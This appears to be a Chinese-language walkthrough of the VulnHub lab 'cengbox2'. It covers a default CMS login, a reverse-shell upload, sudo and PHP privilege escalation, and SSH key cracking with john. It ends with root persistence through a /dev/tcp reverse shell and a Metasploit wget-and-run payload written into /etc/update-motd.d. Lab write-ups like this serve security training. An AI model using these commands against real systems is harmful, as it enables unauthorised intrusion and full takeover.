vulnhub靶機-cengbox2

1、掃描靶機ip：192.168.0.112

2、掃描靶機開放端口

21
22
80

3、訪問80端口除了下面的這個界面就沒什麼有用的信息了

4、ftp連接查看一下得到一個note.txt文件

Hey Kevin,
I just set up your panel and used default password. Please change them before any hack.

I try to move site to new domain which name is ceng-company.vm and also I created a new area for you.

Aaron

5、根據上面的提示，有一個站點被移動到了域名ceng-company.vm 上，設置hosts文件（前面的文章有介紹），使用gobuster進行掃描子域名，找到一個admin.ceng-company.vm的站點，但是直接訪問是403

gobuster vhost -u ceng-company.vm -w domain.txt domain.txt

6、掃描目錄，發現了一個gila目錄

gobuster dir -u ceng-company.vm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

 

7、訪問gila目錄，發現是個cms，默認後臺就是admin

8、這裏的登錄用戶名是郵箱格式，根據之前note.txt的信息，拼湊出用戶名[email protected]，密碼是默認密碼admin

[email protected]/admin

9、這裏content模塊裏面有個file manager功能，可以上傳文件，但是直接在網站根目錄下上傳文件沒有反應，應該是沒有權限

10、看到有個tmp文件夾，發現這個文件夾能夠成功上傳反彈shell的腳本，但是這裏有個.htacccess文件做了限制，直接把內容刪除就行了

11、本地開啓監聽，訪問頁面，成功接收到反彈的shell

12、使用ppython3提權

python3 -c "import pty;pty.spawn('/bin/bash')"

13、使用sudo -l顯示出自己(執行 sudo 的使用者)的權限，發現可以無密碼使用swartz身份執行/home/swartz/runphp.sh

14、使用php提權到swartz

sudo -u swartz /home/swartz/runphp.sh
system("/bin/bash");

15、在home目錄下發現了另一個用戶文件夾，並且有權限進行查看，發現了個.ssh文件夾，裏面有個id_rsa文件，可以放到本地進行破解保存密碼，然後使用該私鑰進行登錄

16、解密私鑰保存密碼，使用私鑰登錄，家目錄下有個user.txt文件，得到第一個flag

/usr/share/john/ssh2john.py id_rsa > private_key #將私鑰文件轉化成John能識別的文件
john private_key --wordlist=/usr/share/wordlists/rockyou.txt #使用john破解保存密碼
ssh -i id_rsa [email protected] #回車輸入legend

17、查找提權可以利用的文件，/etc/update-motd.d文件夾下的腳本會在用戶通過ssh登錄時自動運行，並且是以root的身份運行，主要的作用就是在登錄之後顯示歡迎等消息。

find / -type f -perm -g+rwx 2>/dev/null

18、有寫權限，直接就將反彈shell的一句話寫入到其目錄下的一個腳本文件中，這裏有兩種方法

（1）使用一句話

echo "bash -c 'bash -i >& /dev/tcp/192.168.0.109/6666 0&>1'" >> shell2.sh
chmod 777 shell2.sh
echo "bash /home/mitnick/shell2.sh" >> /etc/update-motd.d/00-header

本地開啓監聽，退出重新ssh連接一下，成功接收反彈的shell，然後查看家目錄下的root.txt文件，拿到最後的flag

（2）使用msf生成文件

use exploit/multi/script/web_delivery 
set target 6
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.0.109
set lport 5555
run

在靶機上執行

echo "wget -qO WfRkW6wz --no-check-certificate http://192.168.0.109:8080/eml0ukKUyXRyfL; chmod +x WfRkW6wz; ./WfRkW6wz& disown" >> /etc/update-motd.d/00-header

退出重新ssh連接一下，成功產生session，查看家目錄下的root.txt文件，拿到最後的flag

這裏第一個session是在mitnick用戶下測試時產生的